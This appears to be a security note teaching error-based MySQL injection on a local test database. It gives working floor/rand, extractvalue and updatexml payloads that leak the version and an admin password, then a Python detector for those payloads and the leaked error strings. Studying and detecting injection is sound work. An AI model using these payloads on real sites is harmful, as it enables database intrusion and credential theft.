Posting some of my old notes. When MySQL executes a statement it throws an error message, and sites built on php+mysql often print that error output on the page, so specific data can be retrieved by constructing statements of the three kinds below.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+

1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id input is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is successfully leaked. To retrieve other data, replace the expression in the position of version() with the query you need.
For example, to query the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
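As an added example from the defending side (not part of the original post): a small detector that flags the three error-based families shown above in query-log lines, and that flags the leaked MySQL error text (ERROR 1062 duplicate group_key, ERROR 1105 XPATH) in HTTP response bodies. The regexes, function names and sample lines are my own constructions.

```python
import re

# Signatures for the three families covered above (constructed regexes).
# Case-insensitive and tolerant of whitespace between tokens.
SIGNATURES = {
    # floor(rand(0)*2) combined with GROUP BY, in either order
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\).*?group\s+by|"
        r"group\s+by.*?floor\s*\(\s*rand\s*\(", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Error text that shows a database error reached the HTTP response body,
# which is what all three techniques depend on.
LEAK_PATTERNS = re.compile(
    r"Duplicate entry '.*?' for key 'group_key'|XPATH syntax error: '", re.I)


def classify_query(sql: str) -> list:
    """Return the names of every error-based family whose signature matches sql."""
    return [name for name, rx in SIGNATURES.items() if rx.search(sql)]


def response_leaks_error(body: str) -> bool:
    """True when the response body carries a MySQL error string usable for extraction."""
    return LEAK_PATTERNS.search(body) is not None


# Constructed sample query-log lines (general_log style) for demonstration.
SAMPLE_QUERIES = [
    "select * from article where id = 1",
    "select * from article where id = 1 and (select 1 from (select count(*),"
    "concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "select * from article where id = 1 and (select count(*) from (select 1 union select null "
    "union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)))",
    "select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))",
    "select * from article where id = 1 and 1=(UPDATEXML(1,concat(0x5e24,(select user()),0x5e24),1))",
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(classify_query(q) or "clean", "<-", q[:70])
    print(response_leaks_error("<p>XPATH syntax error: '^$admin888^$'</p>"))
```

Feeding these patterns into a WAF rule or a general_log monitor gives an early signal, and the leak check is a cheap regression test that display_errors really is off on the page.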
All, thanks foreign guys.